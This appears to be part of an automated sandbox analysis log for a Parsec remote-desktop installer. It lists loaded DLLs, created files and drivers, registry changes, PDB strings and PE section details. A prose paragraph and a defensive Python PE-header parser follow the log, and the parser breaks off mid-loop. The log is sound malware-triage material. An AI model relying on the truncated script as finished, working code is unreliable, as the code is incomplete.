Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: apphelp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wtsapi32.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: sas.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: windows.storage.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wldp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msasn1.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptsp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: rsaenh.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptbase.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: gpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptnet.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: profapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: iphlpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winnsi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winhttp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: mswsock.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Parsec.lnk.12.drLNK file: ..\..\..\..\..\..\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpWindow found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-add.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-install.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\teams.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\appdata.json
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: uu8v4UUzTU.exeStatic file information: File size 50493432 > 1048576
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 0000004A.00000003.2108779412.0000026240A6A000.00000004.00000020.00020000.00000000.sdmp, SETFD68.tmp.74.dr
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000039.00000002.2090721984.000001F9FBA9F000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000039.00000003.2066450318.000001F9FBAAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000001.00000002.2152942703.000000000018D000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdbGCTL source: is-NRIH7.tmp.1.dr
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000037.00000003.2032436401.000002B48D5F1000.00000004.00000020.00020000.00000000.sdmp, SETDCF0.tmp.53.dr, parsecvusba.sys.46.dr
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdb source: is-NRIH7.tmp.1.dr
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: is-I39R4.tmp.1.dr Static PE information: 0xC9B97BBC [Wed Mar 31 00:30:52 2077 UTC]
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 5_2_00466550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs, 5_2_00466550
Source: uu8v4UUzTU.exe Static PE information: section name: .didata
Source: uu8v4UUzTU.tmp.0.dr Static PE information: section name: .didata
Source: is-O0GNS.tmp.1.dr Static PE information: section name: .didat
Source: is-61CCU.tmp.1.dr Static PE information: section name: .didat
Source: is-CEDA5.tmp.1.dr Static PE information: section name: .didat
Source: is-DQG3S.tmp.1.dr Static PE information: section name: .didata
Source: is-NRIH7.tmp.1.dr Static PE information: section name: .didat
Source: is-9HECR.tmp.1.dr Static PE information: section name: .didat
Source: is-IJKK2.tmp.1.dr Static PE information: section name: .didat
Source: is-4HGOQ.tmp.1.dr Static PE information: section name: .didat
Source: is-HI4IL.tmp.1.dr Static PE information: section name: .didat
Source: is-G4CQT.tmp.1.dr Static PE information: section name: .didat
Source: is-HA8AR.tmp.1.dr Static PE information: section name: .didat
Source: is-PGRCJ.tmp.1.dr Static PE information: section name: .didat
Source: is-1L3B3.tmp.1.dr Static PE information: section name: .didat
Source: is-HQ9KB.tmp.1.dr Static PE information: section name: .didat
Source: is-ULHI4.tmp.1.dr Static PE information: section name: .didat
Source: is-6DK0L.tmp.1.dr Static PE information: section name: .didat
Source: is-BOVF1.tmp.1.dr Static PE information: section name: .didat
Source: is-0LBKR.tmp.1.dr Static PE information: section name: .didat
Source: is-H8DB6.tmp.1.dr Static PE information: section name: .didat
Source: is-G92OK.tmp.1.dr Static PE information: section name: .didata
Source: is-K5NEU.tmp.1.dr Static PE information: section name: .didat
Source: teams.exe.12.dr Static PE information: section name: _RDATA
Source: parsecd.exe.12.dr Static PE information: section name: _RDATA
Source: pservice.exe.12.dr Static PE information: section name: _RDATA
Source: parsecd-150-93b.dll.12.dr Static PE information: section name: .detourc
Source: parsecd-150-93b.dll.12.dr Static PE information: section name: .detourd
Source: parsecd-150-93b.dll.12.dr Static PE information: section name: _RDATA
Source: nefconc.exe.46.dr Static PE information: section name: .detourc
Source: nefconc.exe.46.dr Static PE information: section name: .detourd
Source: nefconc.exe.46.dr Static PE information: section name: _RDATA
Source: nefconw.exe.46.dr Static PE information: section name: .detourc
Source: nefconw.exe.46.dr Static PE information: section name: .detourd
Source: nefconw.exe.46.dr Static PE information: section name: _RDATA
Source: parsecvusba.sys.46.dr Static PE information: section name: PAGED
Source: SETDCF0.tmp.53.dr Static PE information: section name: PAGED
Source: SETDEC5.tmp.55.dr Static PE information: section name: PAGED
Source: nefconw.exe.66.dr Static PE information: section name: .detourc
Source: nefconw.exe.66.dr Static PE information: section name: .detourd
Source: nefconw.exe.66.dr Static PE information: section name: _RDATA
Source: mm.dll.66.dr Static PE information: section name: _RDATA
Source: SETFD68.tmp.74.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 5_2_0043F496 push rcx; ret 5_2_0043F497
Source: C:\Program Files\Parsec\pservice.exe Code function: 40_2_00007FF7EC03569C push rax; retf 0000h 40_2_00007FF7EC03569D
Source: is-HQ9KB.tmp.1.dr Static PE information: section name: .text entropy: 7.183765567357945
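The static observations above (a TimeDateStamp that decodes to the year 2077, section names such as .detourc/.detourd and .didat, and a .text section with entropy above 7) can all be reproduced from the PE headers alone, without running anything. The script below is an added example, not part of the Joe Sandbox report and not code from any of the analysed binaries: a minimal PE header parser that flags a link time in the future, section names outside a short allowlist, and sections with high Shannon entropy. It assumes only the standard PE32+ layout; the image it analyses is built in memory by build_pe(), a constructed test fixture rather than one of the dropped files, so it runs offline. The COMMON_SECTIONS allowlist is the editor's judgement, not a Joe Sandbox list; the Detours sections are deliberately left out of it so they surface.

```python
import math
import struct
import time
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Section names that are routine in Windows binaries. ".didat"/".didata" hold
# delay-load import data, "_RDATA" comes from recent MSVC CRTs, "PAGED" is a
# pageable driver section. ".detourc"/".detourd" (Microsoft Detours payload
# sections) are deliberately left out so they surface for review.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata",
                   ".edata", ".tls", ".bss", ".CRT", ".didat", ".didata", "_RDATA",
                   "PAGED", "INIT"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is uniformly random, above ~7 hints at packing/encryption."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe(blob: bytes) -> Dict:
    """Read TimeDateStamp and the section table from a raw PE image."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    table = coff + 20 + opt_size            # section table follows the optional header
    sections = []
    for i in range(nsect):
        off = table + 40 * i
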